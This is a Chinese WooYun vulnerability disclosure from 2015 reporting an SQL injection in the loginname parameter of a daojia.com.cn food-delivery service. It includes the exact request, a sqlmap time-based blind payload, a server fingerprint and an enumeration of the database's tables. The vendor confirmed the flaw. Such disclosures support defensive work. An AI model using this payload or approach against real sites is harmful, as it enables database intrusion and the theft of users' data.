当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0149073

漏洞标题:到家美食会某平台SQL注入漏洞泄露大量用户密码

相关厂商:daojia.com.cn

漏洞作者: 路人甲

提交时间:2015-10-24 14:31

修复时间:2015-12-12 11:52

公开时间:2015-12-12 11:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-24: 细节已通知厂商并且等待厂商处理中
2015-10-28: 厂商已经确认,细节仅向厂商公开
2015-11-07: 细节向核心白帽子及相关领域专家公开
2015-11-17: 细节向普通白帽子公开
2015-11-27: 细节向实习白帽子公开
2015-12-12: 细节向公众公开

简要描述:

到家美食会成立于2010年4月,是品质外卖平台的领军品牌,通过自建物流提供一站式订餐送餐服务。
目前,到家美食会送餐服务已经覆盖北京、上海、杭州、苏州、南京、常州、天津、无锡、深圳、广州等10大城市,与6000多家品牌餐厅建立了合作关系,拥有超过3000人的自有物流团队,为100多万家庭用户提供送餐服务。依托专业的呼叫中心、网站和手机客户端等多平台订餐支持,配以正规统一的标准外送服务,确保将丰富多样的餐厅菜品完美复制到餐桌。
到家美食会坚持与品牌餐厅合作及自建物流团队配送的运营模式,并始终秉承“用心送外卖”的服务宗旨,创建“送餐到家,服务到家”的特色外卖服务,成为新时代“宅”生活的美食速递专家。
优秀的服务品质赢得用户口碑的同时也获得了投资方的认可,2014年10月,到家美食会已完成由京东、麦格理共同领投的D轮融资。

详细说明:

http://b.daojia.com.cn/


GET /service.php?action=2147483651&loginname=admin1&security=J6EFD&uid=1445602304522 HTTP/1.1
Host: b.daojia.com.cn
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
Accept: */*
Referer: http://b.daojia.com.cn/reset.php
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: currentCity=1; DaojiaDinnerBox=; Hm_lvt_94cfa510944eefd27564a777cd1d4ec5=1445601835; Hm_lpvt_94cfa510944eefd27564a777cd1d4ec5=1445601835; daojia=[][][1][][/index.php
%3Fcity%3D1][][][0]; PHPSESSID=qsqhq0uhb87db8o86789skn1p2; SERVERID=2


1.png

漏洞证明:

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: loginname (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: action=2147483651&loginname=admin1') AND (SELECT * FROM (SELECT(SLEEP(5)))UnRk) AND ('szIN'='szIN&security=J6EFD&uid=1445602304522
---
[10:02:59] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.5
web application technology: Apache 2.2.15
back-end DBMS: MySQL 5.0.12
[10:02:59] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\b.daojia.com.cn'
[*] shutting down at 10:02:59


1.png


available databases [3]:
[*] daojia
[*] information_schema
[*] test


Database: daojia
[29 tables]
+---------------------------------------+
| Tbl_Area |
| Tbl_Card |
| Tbl_CardCatagory |
| Tbl_CardNoRange |
| Tbl_CardPatch |
| Tbl_CardPayingRecord |
| Tbl_City |
| Tbl_Config |
| Tbl_CustomValueAccount |
| Tbl_CustomValueAccountTransaction |
| Tbl_CustomValueAccountTransactionStat |
| Tbl_DaoJiaAccountStat |
| Tbl_DepositTransaction |
| Tbl_GiftCard |
| Tbl_GiftCardSubNumber |
| Tbl_Invite |
| Tbl_InviteStat |
| Tbl_Province |
| Tbl_Reconciliation |
| Tbl_RestaurantDelayedLog |
| Tbl_SM |
| Tbl_ServiceMan |
| Tbl_Session |
| Tbl_Third_Delivery_Config |
| Tbl_ToAuditCard |
| Tbl_ToAuditCooperation |
| Tbl_UpgradeLog |
| Tbl_UsedCard |
| bakTbl_Reconciliation20151022 |
+---------------------------------------+

1.png

修复方案:

= =

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-10-28 11:50

厂商回复:

漏洞已确认,多谢帮助!

最新状态:

暂无


漏洞评价:

评论